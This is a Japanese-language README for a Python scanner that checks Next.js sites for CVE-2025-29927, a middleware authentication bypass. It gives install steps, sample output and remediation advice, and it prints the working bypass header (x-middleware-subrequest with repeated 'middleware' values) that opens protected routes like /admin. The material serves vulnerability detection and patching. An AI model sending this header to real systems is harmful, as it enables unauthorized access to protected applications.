
🔐 CVE-2025-29927 向けの Python ベースのスマートスキャナー — Next.js ミドルウェアの認証バイパス脆弱性。メタリフレッシュ、キーワードベースのリダイレクトなどを検出します。
このPythonベースのスマートスキャナは、Next.jsアプリケーションにおける CVE-2025-29927 脆弱性の検出を支援します—この脆弱性は、細工されたHTTPヘッダーを使って攻撃者が認証をスキップできるようにする重大なミドルウェアバイパスです。
🧠 このツールは、HTTPリダイレクトだけでなく、
<meta http-equiv="refresh">のようなクライアントサイドのリダイレクトメカニズム、キーワードベースのログインリダイレクト、サイレント認証バイパスも検出します。
x-middleware-subrequest バイパスヘッダー<meta refresh> ベースのリダイレクトlogin、sign in、authentication などのキーワードを含むHTMLコンテンツ$ python3 CVE-2025-29927.py
🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin
→ Testing with header: middleware:middleware:middleware:middleware:middleware
↳ HTTP Status: 200
↳ Redirect detected: No
✅ VULNERABLE! Bypass successful with header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Main interactive scanner
├── requirements.txt # Python dependencies
└── README.md # This file
requests
beautifulsoup4
colorama
アプリが影響を受ける場合は、次の対応を行ってください:
v15.2.3 以降(または 14.2.25+ / 13.5.7+)にします。x-middleware-subrequest ヘッダーを除去します:proxy_set_header x-middleware-subrequest "";
CVE-2025-29927 は、攻撃者が細工された値を持つ x-middleware-subrequest ヘッダーを操作して、Next.js のミドルウェアチェックをバイパスできるようにします。例:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
影響を受けるバージョンでは、これによりミドルウェアの実行が完全に無効化され、/dashboard や /admin などの保護されたルートへの直接アクセスが可能になります。
メンテナー: @mrzblackhat
Telegramで提案、改善、貢献についてお気軽にご連絡ください。
next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking
このツールは教育および研究目的のみで提供されています。責任を持って使用してください。